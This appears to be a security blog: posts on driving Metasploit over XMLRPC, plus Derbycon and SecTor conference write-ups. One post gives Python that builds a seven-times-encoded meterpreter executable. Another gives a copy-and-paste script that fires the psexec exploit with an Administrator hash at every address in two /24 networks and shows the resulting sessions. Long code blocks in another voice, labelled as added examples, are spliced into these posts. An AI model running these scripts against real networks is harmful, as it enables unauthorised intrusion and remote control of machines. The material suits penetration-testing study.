Blog.HappyPacket.net

Security Notes, News, and Thoughts

New MSFRPC Post

I have posted a new article about using MSFRPC over at http://blog.spiderlabs.com. The post walks you through how to talk to Metasploit using Python and shows off some new code that I released as part of the SpiderLabs Git repo at https://github.com/SpiderLabs/msfrpc. Let me know if you have thoughts or suggestions.

Derbycon

It's been busy here. I've been getting ready to present at SecTor in Toronto, and at Triangle InfoSec Con in Raleigh next week.

But, I wanted to take a few minutes to update the blog about Derbycon.

Derbycon was incredible. I am humbled and grateful that the organizers allowed me to participate, and I look forward to being able to attend next year. It was great to see everyone there. I would highly recommend this conference for InfoSec practitioners. In case you missed it, the videos have been posted. I have also posted the latest tarball for my code for the project I talked about at Derbycon.

Derbycon was also my first chance to see my new book in print. I'm very excited about it. I hope those of you who choose to buy a copy find it useful. Feel free to drop me a line if there is other detail you would like to see in a book. Jason and I are looking into taking a deeper dive into the subject matter in hopes of a new project.

Slides and Code from Vegas

Thanks to all who came to see me present this week. I had a great time. I have gotten some good feedback from folks, so I'm going to be updating a lot of code in the near future. As I clean things up and release production versions I will be posting videos online. Until then, here are the slides and code; if you have any questions, feel free to email me or hit me up on twitter.

Code: http://www.happypacket.net/VegasCode2010.tar.bz2

Slides: http://www.slideshare.net/sussurro

Thanks,
Sussurro

Fun with Metasploit payload generation

Tonight has been fun: I have been learning more about how payloads are generated inside Metasploit. My goal was to figure out how to add the msfencode functionality into the generate_simple function that is used by both XMLRPC and the console, so that you can encode payloads and all that fun stuff from within Metasploit. I think I have it working now, and once Metasploit is loaded there seems to be a significant speed difference. Here is what I found:

I wrote a quick XMLRPC test that asks Metasploit for an executable payload, encoded 7 times with whichever encoder it thinks is best. The code I'm using hasn't been committed or submitted yet, but if you want to test it I can provide you a patch until I'm happy enough with it to submit it.

import xmlrpclib
import binascii
import sys

# Connect to the XMLRPC service started with "load xmlrpc" in msfconsole.
proxy = xmlrpclib.ServerProxy("http://localhost:55553")

# Authenticate first; every later call must present the token this returns.
ret = proxy.auth.login("msf", "abc123")
if ret['result'] == 'success':
    token = ret['token']
else:
    sys.exit("Could not login\n")

# Generation options: executable output, seven encoder passes, and encode
# even when the raw payload would not strictly need it.
opts = {
    "Format": 'exe',
    "Iterations": 7,
    "ForceEncode": True}

# The patched module.execute hands the generated payload back hex-encoded.
ret = proxy.module.execute(token, "payload", "windows/meterpreter/bind_tcp", opts)
if ret['result'] == 'success':
    # Write the raw bytes rather than print, so no newline is appended to the exe.
    sys.stdout.write(binascii.unhexlify(ret['payload']))

Next, I timed the XMLRPC approach against the traditional msfpayload | msfencode pipeline:

root@bt:~/msfmods/py# time (python get_payload.py > /tmp/test3)

real 0m3.839s
user 0m0.020s
sys 0m0.043s
root@bt:~/msfmods/py# time (~/metasploit/msfpayload windows/meterpreter/bind_tcp raw | ~/metasploit/msfencode -t exe -c 5 -o /tmp/test2 2>/dev/null )

real 0m10.548s
user 0m7.553s
sys 0m2.920s
root@bt:~/msfmods/py# file /tmp/test2 /tmp/test3
/tmp/test2: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
/tmp/test3: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit

The XMLRPC path is clearly faster, and since that timing still includes a login round-trip, reusing the token across requests could trim a little more off it. Being able to do this over XMLRPC should give folks an easy way to grab payloads remotely for common tasks.
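The only validation the returned blob gets above is the `file` command. The following is an added example (mine, not code from this post or from Metasploit) that performs the same check in Python on the hex string module.execute returns: it decodes the payload and walks the MZ header, the PE signature, the COFF header and the optional header to confirm the result really is a 32-bit GUI PE image before it is trusted or written anywhere. The function names are my own, and build_sample_pe constructs a minimal headers-only PE image purely so the checks can run offline.

```python
import binascii
import struct

# IMAGE_FILE_HEADER.Machine values and IMAGE_OPTIONAL_HEADER.Subsystem values
# we care about; anything else is reported as unknown rather than guessed.
MACHINES = {0x14C: "Intel 80386", 0x8664: "x86-64", 0x1C0: "ARM", 0xAA64: "Aarch64"}
SUBSYSTEMS = {1: "native", 2: "GUI", 3: "console"}


def describe_pe(blob):
    """Parse the DOS header, PE signature, COFF and optional headers.

    Raises ValueError for anything that is not a well-formed PE image.
    """
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]          # offset of "PE\0\0"
    if e_lfanew + 24 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # COFF file header: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsections, _, _, _, opt_size, characteristics = struct.unpack_from(
        "<HHIIIHH", blob, e_lfanew + 4)
    opt = e_lfanew + 24
    if opt_size < 70 or opt + opt_size > len(blob):
        raise ValueError("optional header truncated")
    magic = struct.unpack_from("<H", blob, opt)[0]               # 0x10B PE32, 0x20B PE32+
    subsystem = struct.unpack_from("<H", blob, opt + 68)[0]      # same offset in both forms
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    return {
        "machine": MACHINES.get(machine, "unknown (0x%x)" % machine),
        "bits": 64 if magic == 0x20B else 32,
        "subsystem": SUBSYSTEMS.get(subsystem, "unknown (%d)" % subsystem),
        "dll": bool(characteristics & 0x2000),                   # IMAGE_FILE_DLL
        "sections": nsections,
    }


def summarize(info):
    """One-line verdict in the spirit of what `file` printed in the post."""
    kind = "DLL" if info["dll"] else "executable"
    return "PE %s for MS Windows (%s) %s %d-bit" % (
        kind, info["subsystem"], info["machine"], info["bits"])


def check_rpc_payload(hex_payload):
    """module.execute returns the payload hex-encoded: decode it, then validate it."""
    blob = binascii.unhexlify(hex_payload)
    return summarize(describe_pe(blob))


def build_sample_pe(machine=0x14C, subsystem=2):
    """Constructed, headers-only PE image used as offline test input (not a real payload)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                      # e_lfanew: right after the DOS header
    magic = 0x20B if machine == 0x8664 else 0x10B
    opt = bytearray(0xE0)                                        # standard PE32 optional header size
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 68, subsystem)
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, len(opt), 0x0102)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    print(check_rpc_payload(build_sample_pe().hex()))
```

In a real client you would call check_rpc_payload on ret['payload'] before writing the bytes out, and treat a ValueError as "the service did not give me what I asked for" rather than saving the blob anyway.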

Have thoughts or suggestions ?

Hit me up at sussurro [aT] happypacket DOT net

Sharing data remotely through Metasploit

I've been working on some more XMLRPC stuff for Metasploit, and I wanted to share a teaser of what is to come. I'm working on more integration between tools, but for now I have written a db module for Metasploit's XMLRPC engine that lets remote processes read information from the database. Below is a quick demo of a remote host that has run an nmap scan uploading the results into Metasploit to be acted on. This is just the tip of the iceberg: the API will allow automated reporting, data sharing across tools, and Metasploit acting as the central knowledge repository where various tools across multiple testers' machines store their data.

I'm still waiting to hear back from Defcon and B-Sides Las Vegas, but if my talk gets accepted either place, you will get to see a whole lot more.

Sorry for the blurry video; I'll do better next time:

Video: "Sharing data between hosts with Metasploit", from Ryan Linn on Vimeo.

PSExec Scanner via Metasploit XMLRPC

I was inspired by Jabra's excellent post on creating a PSExec scanner with Metasploit and Perl to demonstrate how this same thing could be done locally or remotely using XMLRPC. The original post by Jabra is also a good way to do this, and can be found here: http://spl0it.wordpress.com/2009/12/17/metasploit-psexec-scanner-via-perl/

Python and the xmlrpclib library make this an easy task. To start with, we need to start Metasploit on our host system and load the xmlrpc plugin:

sussurro@msfdev:~/metasploit$ ./msfconsole

[msfconsole ASCII-art banner]


=[ metasploit v3.3.3-dev [core:3.3 api:1.0]
+ -- --=[ 305 exploits - 67 auxiliary
+ -- --=[ 171 payloads - 20 encoders - 6 nops
=[ svn r7908 updated today (2009.12.17)

msf > load xmlrpc Pass=abc123 ServerType=Web
[*] XMLRPC Service: 127.0.0.1:55553
[*] XMLRPC Username: msf
[*] XMLRPC Password: abc123
[*] XMLRPC Server Type: Web
[*] XMLRPC Web URI: /RPC2
[*] Successfully loaded plugin: xmlrpc
msf >

After XMLRPC is loaded, we can get down to some Python programming.

The assumption is, much like with Jabra's program, that we are going to be scanning two networks, 192.168.1.X and 192.168.2.X. The first thing we need to do is get authenticated into Metasploit.

import xmlrpclib

user = "msf"
password = "abc123"
token = ""

# Connect to the XMLRPC plugin loaded above; /RPC2 is the Web URI it printed.
msf = xmlrpclib.ServerProxy("http://localhost:55553/RPC2")
auth = msf.auth.login(user, password)

# Keep the token: every later call must present it.
if auth["result"] == "success":
    token = auth["token"]
else:
    exit("Login failed, try again\n")

We set up our username, msf, and our super secret password of abc123 first, and then we use the xmlrpclib library to connect to our Metasploit server. Once connected, the msf object holds our connection information.

Once connected, the first thing we need to do is authenticate so that we get an authentication token. The token is required for every later call and stays valid unless your session goes idle. We authenticate with the "auth.login" method, and the object we get back contains our token.

Next we need to call the actual exploit. To make the calls a little clearer, we create a small function:

def callSploit(ip):
    # Launch windows/smb/psexec against one host. The options dict carries
    # exactly what would otherwise be "set" in the console.
    ret = msf.module.execute(token, "exploit", "windows/smb/psexec",
        {
            "RHOST": ip,
            "PAYLOAD": "windows/meterpreter/bind_tcp",
            "SMBUser": "Administrator",
            "SMBPass": "LM:NTLM HASH"})
    if ret["result"] != "success":
        print "Exploit failed for " + ip + "\n"

We have defined a function called callSploit which takes an IP address. It asks our Metasploit connection to run module.execute, passing our authentication token, the type of module we are calling (exploit) and the module itself. The final argument holds all of the options we would traditionally set inside the Metasploit console. Once we launch the exploit we get back a result object; a result of success means the request was valid. While the requests are launching, we can see the sessions popping up in the Metasploit console and can interact with them one at a time.
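To make the auth.login and module.execute exchange described in the last few paragraphs concrete without a live Metasploit instance, here is an added example of my own (not code from this post or from the Metasploit project). It is written against Python 3's xmlrpc.client rather than the Python 2 xmlrpclib used above. StandInMsfRpc is a constructed stand-in, not Metasploit: it answers the same two dotted method names with the same {"result": ..., "token": ...} structures the post relies on, and it refuses module.execute calls that do not carry a token it issued. MsfRpcClient is the client-side wrapper; unlike the snippet above, it stops rather than carrying on when the login fails. All class and function names here are mine, and the "msf"/"abc123" credentials simply mirror the "load xmlrpc" line earlier in the post.

```python
import secrets
import threading
import xmlrpc.client
from xmlrpc.server import SimpleXMLRPCServer


class StandInMsfRpc:
    """Constructed stand-in for the XMLRPC plugin: NOT Metasploit, just the wire shape."""

    def __init__(self, user="msf", password="abc123"):
        self._user, self._password = user, password
        self.tokens = set()     # tokens handed out by auth.login
        self.executed = []      # (module type, module name, options) of accepted calls

    def login(self, user, password):
        # Answers <methodName>auth.login</methodName>
        if user != self._user or password != self._password:
            return {"result": "failure"}
        token = secrets.token_hex(16)
        self.tokens.add(token)
        return {"result": "success", "token": token}

    def execute(self, token, mtype, mname, opts):
        # Answers <methodName>module.execute</methodName>. The token is the only
        # proof of who is calling: whoever presents it can drive the server.
        if token not in self.tokens:
            return {"result": "failure"}
        self.executed.append((mtype, mname, dict(opts)))
        return {"result": "success"}


def start_stand_in(backend):
    """Serve the stand-in on an ephemeral loopback port; returns (server, url)."""
    server = SimpleXMLRPCServer(("127.0.0.1", 0), logRequests=False)
    # Dotted names are registered as plain strings; the dispatcher matches the
    # methodName from the request against them literally.
    server.register_function(backend.login, "auth.login")
    server.register_function(backend.execute, "module.execute")
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d/RPC2" % server.server_address[1]


class MsfRpcClient:
    """Logs in once, keeps the token, and refuses to proceed unauthenticated."""

    def __init__(self, url):
        self.proxy = xmlrpc.client.ServerProxy(url)
        self.token = None

    def login(self, user, password):
        ret = self.proxy.auth.login(user, password)
        if ret.get("result") != "success":
            raise PermissionError("login failed for user %r" % user)
        self.token = ret["token"]
        return self.token

    def execute(self, mtype, mname, opts):
        if self.token is None:
            raise RuntimeError("call login() first; every call must carry the token")
        return self.proxy.module.execute(self.token, mtype, mname, opts)


if __name__ == "__main__":
    backend = StandInMsfRpc()
    server, url = start_stand_in(backend)
    client = MsfRpcClient(url)
    client.login("msf", "abc123")
    print(client.execute("payload", "windows/meterpreter/bind_tcp",
                         {"Format": "exe", "Iterations": 7, "ForceEncode": True}))
    server.shutdown()
```

Point the same MsfRpcClient at a real http://localhost:55553/RPC2 and the calls are identical; the stand-in exists only so the token handling can be exercised and tested offline.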

The next stage in our program is the actual call of our new function:

# Walk the 192.168.1.X and 192.168.2.X networks (range(1, 3) yields 1 and 2;
# the original range(1, 2) only covered the .1 network).
for net in range(1, 3):
    for ip in range(1, 254):
        callSploit("192.168." + str(net) + "." + str(ip))
        time.sleep(1)

print "DONE.. check for shells"

Here we loop over the 192.168.1 and 192.168.2 ranges, every host address in each, and call callSploit for each one. The jobs will be running quickly; if you look inside msfconsole and type "jobs" repeatedly you should see

msf > jobs

Jobs
====

Id Name
-- ----
2 Exploit: windows/smb/psexec

Finally, once a host succeeds, you should see

[*] Meterpreter session 4 opened (192.168.1.5:36435 -> 192.168.1.44:4444)
[*] Meterpreter session 5 opened (192.168.1.5:43357 -> 192.168.1.130:4444)
[*] Meterpreter session 6 opened (192.168.1.5:48619 -> 192.168.2.3:4444)
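The script only prints "check for shells" and leaves the bookkeeping to whoever is watching the console. The following is an added example of my own (not from the post) that parses those "session opened" console lines into structured records and tallies the session peers per target network, which is the raw material for a results table later. The three session lines are the ones the post shows; the other two lines in SAMPLE_CONSOLE are constructed filler to show that unrelated output is ignored, and the function names are mine. Metasploit prints the tunnel as local -> peer, so with the bind payload used here the peer is the host that was exploited.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample console output: the three session lines are the post's,
# the two other lines are filler that the parser must skip.
SAMPLE_CONSOLE = """\
[*] (constructed filler line) scan starting
[*] Meterpreter session 4 opened (192.168.1.5:36435 -> 192.168.1.44:4444)
[*] Meterpreter session 5 opened (192.168.1.5:43357 -> 192.168.1.130:4444)
[-] (constructed filler line) 192.168.1.9 - exploit failed
[*] Meterpreter session 6 opened (192.168.1.5:48619 -> 192.168.2.3:4444)
"""

# "[*] Meterpreter session N opened (local:port -> peer:port)"
SESSION_RE = re.compile(
    r"^\[\*\] (?P<kind>\w+) session (?P<sid>\d+) opened "
    r"\((?P<local>[\d.]+):(?P<lport>\d+) -> (?P<peer>[\d.]+):(?P<pport>\d+)\)")


def parse_sessions(console_text):
    """Return one dict per 'session opened' line, in console order."""
    sessions = []
    for line in console_text.splitlines():
        m = SESSION_RE.match(line.strip())
        if not m:
            continue
        sessions.append({
            "sid": int(m["sid"]),
            "kind": m["kind"],
            "local": m["local"], "lport": int(m["lport"]),
            "peer": m["peer"], "pport": int(m["pport"]),
        })
    return sessions


def peers_by_network(sessions, networks):
    """Count session peers per target network; peers outside them land under 'other'."""
    nets = [ipaddress.ip_network(n) for n in networks]
    counts = Counter()
    for s in sessions:
        addr = ipaddress.ip_address(s["peer"])
        label = next((str(n) for n in nets if addr in n), "other")
        counts[label] += 1
    return dict(counts)


def report(console_text, networks=("192.168.1.0/24", "192.168.2.0/24")):
    """Human-readable summary of which hosts came back, grouped by network."""
    sessions = parse_sessions(console_text)
    lines = ["%d session(s) opened" % len(sessions)]
    for s in sessions:
        lines.append("  session %d: %s:%d via %s:%d" % (
            s["sid"], s["peer"], s["pport"], s["local"], s["lport"]))
    for net, n in sorted(peers_by_network(sessions, networks).items()):
        lines.append("  %s: %d host(s)" % (net, n))
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_CONSOLE))
```

Feed it the console log (or the output of "sessions -l" once you have adapted the pattern) and you get a per-network count instead of scrolling back through the console by hand.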


To get Metasploit, go over to http://www.metasploit.com
Jabra's blog is a great read: http://spl0it.wordpress.com

Here is the script in easier copy and paste form:
#!/usr/bin/python

import xmlrpclib
import time
import sys

user = "msf"
password = "abc123"
token = ""

# Connect to the XMLRPC plugin loaded in msfconsole and authenticate; the
# token returned here must be presented on every later call.
msf = xmlrpclib.ServerProxy("http://localhost:55553/RPC2")
auth = msf.auth.login(user, password)

if auth["result"] == "success":
    token = auth["token"]
else:
    sys.exit("Login failed, try again\n")

def callSploit(ip):
    # Launch windows/smb/psexec against one host; the options dict carries
    # what would otherwise be "set" in the console.
    ret = msf.module.execute(token, "exploit", "windows/smb/psexec",
        {
            "RHOST": ip,
            "PAYLOAD": "windows/meterpreter/bind_tcp",
            "SMBUser": "Administrator",
            "SMBPass": "LM:NTLM HASH"})
    if ret["result"] != "success":
        print "Exploit failed for " + ip + "\n"

# Walk the 192.168.1.X and 192.168.2.X networks (range(1, 3) yields 1 and 2;
# the original range(1, 2) only covered the .1 network).
for net in range(1, 3):
    for ip in range(1, 254):
        callSploit("192.168." + str(net) + "." + str(ip))
        time.sleep(1)

print "DONE.. check for shells"

Thoughts on SecTor

Last week I had the opportunity to speak at SecTor: Canada's Premier IT Security Conference. I had heard positive feedback regarding the conference from previous years, and as the conference is only in its 3rd year, the number of attendees was impressive. I have attended a number of other conferences in the past year including ShmooCon, BlackHat and Defcon, and the organization of this conference compared well. For a new conference, SecTor had a great lineup of speakers, quality vendors, and some great keynotes.

From a speaker's perspective, my first communications with the SecTor team came during the Call For Papers (CFP) stage. Brian Bourne, the primary face of SecTor, was very responsive through this process, and once I had been notified that I had been accepted to speak the rest of the planning started. Nanna Ng initiated the trip planning process and guided me through all the steps needed to get plane and hotel reservations handled. SecTor takes excellent care of their speakers. I was amazed at the lengths they went to in order to make my trip painless.

SecTor had handled the booking for both airlines and hotel, so once I had all my presentation materials in, all I had to do was show up at the airport. After landing in Toronto there was a car waiting for me to take me to the hotel, where I was checked in without incident. The accommodations at the InterContinental hotel were great and it was attached to the conference center so it was just a short walk from the hotel room to the conference area. The SecTor team had worked to make sure that the travel was painless and the experience that they created for the speakers was amazing.

The conference itself started on Tuesday although there was some training on Monday. After some opening remarks by Brian, Chris Hoff delivered a great keynote on Cloud Computing. Chris is a great speaker and brought forth a ton of information on "the cloud" in an easy to understand way and really made all of the information mesh.

Following the keynotes the sessions started. The first session I attended was "When Web 2.0 Attacks - Understanding AJAX, Flash and 'Highly Interactive Technology'" by Rafal Los. Rafal is a great speaker and had some good information on the vulnerabilities that Web 2.0 presents when implemented poorly, with some great points on how many of the old vulnerabilities we thought had been dealt with are re-emerging in Web 2.0. I really enjoyed this talk.

Andrew Nash from PayPal delivered a lunch keynote. While this was my least favorite keynote, there was good information on identity management. Mr Nash is a good speaker, unfortunately I am not sure that it was as relevant to as many people at the conference. I thought it was interesting to hear some of what PayPal was doing, but there was no real link into how anyone else can leverage the resources or how the information pertained to us aside from that PayPal is working hard to protect our information.

The afternoon sessions were great. After lunch I headed over to see Jennifer Jabbusch's talk "Retaliation: Breaking Attack Vectors in the Infrastructure". She did a great job of explaining emerging threats on the network and what the latest standards are doing to help protect layers 2 and 3 in the network.

The next talk that I went to was by Robert Hansen (RSnake) on "Consumerization and Future State of Information Warfare". Robert focused on where information warfare is heading and how the technology used by attackers has grown to the point where we are likely to see automated identities soon: automated applications that play a role in order to bring people into their social media circle, where the typical spam and malware will be distributed sparingly between meaningful information. Overall a really informative talk, although the findings of his research were a little disheartening, as it is obvious that the attackers are moving quickly and are very agile.

That evening was a reception and speakers dinner at Joe Badalis. I thought that this was hugely successful. I met some great people and had a chance to talk with both attendees and other speakers and it was overall a great time. The dinner that followed the reception was great and I had some awesome discussions with the other folks at the table. This was a great experience and I hope they keep this for future years.

There was no keynote on Wednesday morning and we instead went directly into talks. I attended Andrés Riancho's two talks on the w3af framework. These talks took up the whole morning, but the time was well spent. I learned much more about the w3af framework and where it is headed.
Andrés gave great demos and examples of everything from how to do a scan to how to write your own module. He even included some information about how w3af handles web scanning compared to other vendors. Andrés offers w3af training in case anyone is interested, so check it out if you want to know more about the w3af framework.

The lunch keynote was by Adam Laurie known as Major Malfunction. The title was "A day in the life of a hacker.." and covered some great stuff on hardware hacking. He was very engaging as a speaker and even included technical examples during the keynote which seems to be very rare. He went in-depth into how the biometric passports work and exposed some of the scarier sides of the technology that you don't normally get to see.

The rest of the day I was presenting. My first talk on Nsploit went ok, although it wasn't an overwhelming success. I'm not sure if it was the post lunch coma, if the talk was too technical, or if it was just boring but I didn't get a lot of interaction during the talk. I did get a lot of good questions after the talk though so that was nice. The second talk on BeEF seemed to go well with great interaction, some awesome questions, and people seemed to be much more into it. Overall it was a good experience but I may need to tweak the Nsploit talk if I do it again.

The conference finished with some closing remarks from Brian again. The vendor drawings were held and folks got their toys, and then a few of us went out for Mexican across the street for some more networking. Overall I got to meet some great people, hear some awesome talks, and had a great experience thanks to the organizers of SecTor. I hope that I get to attend next year, whether as a presenter again or as an attendee I know that I will enjoy it.

Thanks again to all the organizers of SecTor for making the trip memorable in a positive way. Hope to see everyone again next year.